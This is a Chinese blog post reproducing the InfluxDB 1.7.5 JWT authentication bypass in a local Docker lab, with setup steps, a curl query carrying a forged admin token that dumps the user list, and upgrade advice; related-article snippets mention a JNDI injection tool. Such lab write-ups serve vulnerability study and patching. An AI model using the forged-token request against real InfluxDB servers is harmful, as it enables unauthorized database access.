influxdb1.7.5认证绕过漏洞复现

最新推荐文章于 2023-07-10 16:47:54 发布
最新推荐文章于 2023-07-10 16:47:54 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: vmware 文章标签: docker linux 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44067239/article/details/106918136
版权

influxdb1.7.5认证绕过漏洞复现

kali docker 环境搭建

你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。

1、kali中安装docker环境

可能会失败,更新一下kali源就可
apt install docker
安装完成之后执行一下 命令测试一下:
安装好后,我们在terminal中就有了docker的命令了

2、安装docker-compose

apt install docker-compose –y

3、启动docker,准备拉取系统镜像

可能会用到的命令命令含义
docker ps -a列出docker启动了哪些镜像和当前状态
service docker start启动docker
root@kali:~# service docker status查看docker运行状态
root@kali:~# docker images查看docker中有哪些镜像
docker run REPOSITORY (名称)运行对应image
docker rmi REPOSITORY (名称)删除对应repository 名称的image镜像
docker run REPOSITORY (名称)启动对应repository 名称的image镜
docker rm CONTAINER ID删除对应container 名称的ps(容器)
docker stop CONTAINER ID终止一个运行中的ps(容器)
docker start CONTAINER ID启动一个容器
docker search inflxudb搜索相关镜像资源
exit退出容器环境

4、拉取对应镜像,这里可指定版本

docker search inflxudb 搜索influxdb相关镜像资源
docker pull influxdb:1.7.5 这里拉取指定版本的influxdb镜像

5、启动镜像

docker run -it -d --name influxdb -p 8086:8086 influxdb:1.7.5 启动指定镜像(这里一定注意加上版本号,否则会重新拉取最新版本的influxdb)
docker exec -it influxdb /bin/bash 进入启动的镜像中

6、命令行连接进入influx数据库,创建用户

influx 连接数据库

use _internal 创建用户
Using database _internal
create user “tutu” with password ‘654321’ with all privileges
show users 查看已有用户
user admin

tutu true

运行结果如下:
在这里插入图片描述
exit 编辑完成后退出数据库连接

7、创建配置文件

参考:https://www.cnblogs.com/woshimrf/p/docker-influxdb.html
docker run --rm influxdb influxd config > influxdb.conf
这里有坑点!!!
命令解释:另开终端,在kali本机命令行中下载influx配置文件,并重定向到influxdb.conf

8、修改配置文件后,设置认证开启

这里可能提示没有vim命令,参考docker中安装vim https://www.cnblogs.com/river2005/p/8503238.html
这里有坑点!!!
需要先敲:apt-get update,这个命令的作用是:同步 /etc/apt/sources.list 和 /etc/apt/sources.list.d 中列出的源的索引,这样才能获取到最新的软件包,不然下一个命令要报错。
等更新完毕以后再敲命令:apt-get install vim命令安装即可
安装好后使用vim修改influxdb配置文件
在这里插入图片描述
[http]
enabled = true
bind-address = “:8086”
auth-enabled = true

9、重启docker中的容器(不是docker),让配置生效

docker restart containerid

10、浏览器访问数据库

重启后就可通过浏览器
http://localhost:8086 访问此数据库,默认情况下需要认证,如图:
在这里插入图片描述

认证绕过-漏洞复现

1、绕过方法

InfluxDB具有Web管理界面,其存在一个默认的admin用户名,利用该用户名生成JSON Web Token后即可绕过认证,获得完整的用户权限,可以任意执行增删改等数据库操作。

2、利用admin用户名,在线生成JSON Web Token

地址:https://jwt.io/
在这里插入图片描述
示例:
在这里插入图片描述

3、发送payload

通过curl命令加上JSON Web Token向数据库发起请求,成功返回数据,则表示该漏洞存在。
直接访问该url情况为:
在这里插入图片描述
加上JSON Web Token后:

curl -G 'http://172.16.12.132:8086/query' --data-urlencode 'q=show users' -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTg4NjI2MzA1fQ.Yq-7RTIJY2IqjT6cqTTi3wbu3g5qR2_surlDkspIMys

在这里插入图片描述
返回数据为:{“results”:[{“statement_id”:0,“series”:[{“columns”:[“user”,“admin”],“values”:[[“admin”,true],[“read”,false],[“write”,false],[“telegraf”,true]]}]}]}
说明成功了

4、漏洞影响及修复建议

本漏洞影响InfluxDB 1.7.5 及以下全版本
InfluxDB官方已发布新版本修复该漏洞,请尽快升级。最新版本为v1.7.10,官方下载链接:https://portal.influxdata.com/downloads/

参考链接

https://www.heibai.org/post/1348.html

莫要做个憨憨
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
influxdb-1.7.5和telegraf-1.10.2
04-03
InfluxDB 是一个时间序列数据库,用于处理海量写入与负载查询。InfluxDB旨在用作涉及大量时间戳数据的任何用例(包括DevOps监控,应用程序指标,物联网传感器数据和实时分析)的后端存储。 特点 为时间序列数据专门编写的自定义高性能数据存储。 TSM引擎具有高性能的写入和数据压缩 Golang编写,没有其它的依赖 提供简单、高性能的写入、查询 http api 插件支持其它数据写入协议,例如 graphite、collectd、OpenTSDB 支持类sql查询语句 tags可以索引序列化,提供快速有效的查询 Retention policies自动处理过期数据 Continuous queries自动聚合,提高查询效率 Telegraf 是收集和报告指标和数据的代理。 Telegraf是TICK Stack的一部分,是一个插件驱动的服务器代理,用于收集和报告指标。 Telegraf 集成了直接从其运行的容器和系统中提取各种指标,事件和日志,从第三方API提取指标,甚至通过StatsD和Kafka消费者服务监听指标。 它还具有输出插件,可将指标发送到各种其他数据存储,服务和消息队列,包括InfluxDB,Graphite,OpenTSDB,Datadog,Librato,Kafka,MQTT,NSQ等等。
InfluxDB1.7.5官网最新版 window版本
03-30
influxDB是一个开源的时序数据库,使用GO语言开发,特别适合用于处理和分析资源监控数据这种时序相关数据。而InfluxDB自带的各种特殊函数如求标准差,随机取样数据,统计数据变化比等,使数据统计和实时分析变得十分方便。
【安全资讯】Debian InfluxDB数据库发现身份验证绕过漏洞,需要尽快升级
翼安研习社的博客
01-06 600
来源: TechWeb.com.cn 发布时间:2021-01-04 Debian是一个完全自由的稳定且安全的基于Linux的操作系统,其使用范围包括笔记本计算机,台式机和服务器。Debian是许多其他发行版(例如:Ubuntu、Deepin、Knoppix、PureOS、SteamOS等)的种子和基础。自1993年以来,它的稳定性和可靠性就深受用户喜爱。 1月1日,Debian InfluxDB时序型数据库发现身份验证绕过漏洞,需要尽快升级。以下是漏洞详情: 漏洞详情 来源:https://www.d
vulhub漏洞复现28_Influxdb
weixin_44193247的博客
02-02 711
vulhub漏洞复现练习篇
数据库漏洞-Influxdb+H2database 复现
xiaoheizi的博客
07-10 700
命令:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A "服务器ip"抓取/query页面的数据包,将Get请求更改为Post请求,在请求中添加令牌,并且添加 POST 请求键值对:db=sample&q=show users。下载漏洞利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。
influxdb1.7.5.rpm官网最新版 Linux版本
03-30
influxDB是一个开源的时序数据库,使用GO语言开发,特别适合用于处理和分析资源监控数据这种时序相关数据。而InfluxDB自带的各种特殊函数如求标准差,随机取样数据,统计数据变化比等,使数据统计和实时分析变得十分...
influxdb-1.7.5-1.7.7_windows_amd64.zip
07-14
时序数据库 InfluxDB v1.7.7 on windows 官方资源包 (Windows Binaries (64-bit))
data-for-1.7.5.zip
08-14
NLP错误解决方案文件,大家有问题可以到我的博客去查看,欢迎赐教
【反序列化】md5_tricks反序列化INF绕过
serendipity1130的博客
11-14 2485
1.代码审计,发现首先要进行强比较的md5绕过,然后传入mytest的反向序列化参数: 2.构造inf绕过,INF的数据类型是float: <?php class myjob { public $test1; public $test2; } $c=new myjob; } echo serialize($c); //O:5:"myjob":2:{s:5:"test1";d:INF;s:5:"test2";d:INF;} 3.post传参绕过md5: param1=%.
InfluxDB-1.7.0 Windows x64
11-09
influxdb是目前比较流行的时间序列数据库。 何谓时间序列数据库? 什么是时间序列数据库,最简单的定义就是数据格式里包含Timestamp字段的数据, 比如某一时间环境的温度,CPU的使用率等。但是,有什么数据不包含Timestamp呢?几乎所有的数据其实都可以打上一个Timestamp字段。
三种打补丁方法
01-27
三种重阳用的打补丁方法
influxdb-1.7.4
02-25
influxdb 1.7.4 时间序列数据库 最新版本 提供给不好下载的同学
influxdb-grafana-vm:在 Vagrant VM 中设置 InfluxDB 和 Grafana 的文件
07-04
influxdb-grafana-vm 在 Vagrant VM 中设置 InfluxDB 和 Grafana 的文件。 用法: vagrant up JFW 在您的环境中不太可能出现这种情况。 您可能需要调整以下内容: Vagrant 框被硬编码为“opscode-ubuntu-14.04”。 很确定它是公开的,但实际上任何 Debian 家族发行版都应该可以正常工作。 所有脚本中的硬编码 IP。 (如果没有其他人拥有 192.168.11.10,则您已准备就绪。) 硬编码的 Mac OS X wifi 网络接口名称。
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现
ran的博客
05-07 2254
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。
漏洞复现Influxdb,H2database,couchDB,ElasticSearch
m0_63917373的博客
11-30 1474
漏洞复现Influxdb,H2database,couchDB,ElasticSearch vulhub vulfocus
InfluxDB 未授权访问漏洞复现
weixin_52125240的博客
03-16 9684
InfluxDB 未授权访问漏洞复现 前言:第一次复现漏洞,肯定会有很多不足的地方,这也是
InfluxDB 未授权访问 漏洞复现
Senimo
07-15 4416
InfluxDB 未授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC参考链接 一、漏洞描述 InfluxDB 是一个开源分布式时序、时间和指标数据库,使用 Go 语言编写,无需外部依赖。其设计目标是实现分布式和水平伸缩扩展,是 InfluxData 的核心产品。其使用 jwt 作为鉴权方式。在用户开启了认证,但未设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在 InfluxDB 中执行SQL语句。 二、漏洞
InfluxDB API 未授权访问漏洞
weixin_44912035的博客
12-31 1281
InfluxDB是一个使用Go语言编写的开源分布式,支持高并发的时序数据库,其使用JWT作为鉴权方式。在用户开启了认证,但未设置参数shared-secret的情况下,JWT的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在InfluxDB中执行SQL语句。 影响版本 InfluxDB < 1.7.6 的版本。 漏洞复现 标识:8086端口 HTTP API 的 X-Influxdb-Version 标志头 ...
influxdb未授权访问漏洞
ADummy的博客
02-18 4072
influxdb未授权访问漏洞 by ADummy 0x00利用路线 ​ Influxdb http query接口—> 生成jwt凭证绕过认证 —>任意sql语句执行 0x01漏洞介绍 ​ InfluxDB是一个使用Go语言编写的开源分布式,支持高并发的时序数据库,其使用JWT作为鉴权方式。在用户开启了认证,但未设置参数shared-secret的情况下,JWT的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在InfluxDB中执行SQL语句。 ​ 影响版本 Discuz &
hanlp 1.7.5
最新发布
12-23
hanlp 1.7.5是一款自然语言处理工具包,它提供了丰富的功能和工具,帮助用户处理中文文本。它包括分词、词性标注、命名实体识别、句法分析、情感分析等多种功能,可以满足用户在文本处理中的各种需求。hanlp 1.7.5还提供了多种模型和算法,可以帮助用户实现文本生成、文本分类、信息抽取等任务。它支持多种编程语言和平台,包括Java、Python等,用户可以方便地在不同的环境中使用hanlp 1.7.5。 除此之外,hanlp 1.7.5还具有良好的性能和稳定性,能够处理大规模的中文文本数据。同时,它还支持自定义词典和模型训练,用户可以根据自己的需求进行定制化的开发。另外,hanlp 1.7.5还提供了详细的文档和示例,帮助用户快速上手和使用工具包中的各项功能。 总之,hanlp 1.7.5是一款功能强大、性能优越、易于使用的中文文本处理工具包,可以帮助用户在自然语言处理领域取得更好的效果和效率。同时,它还在不断更新和改进中,为用户提供更好的体验和支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值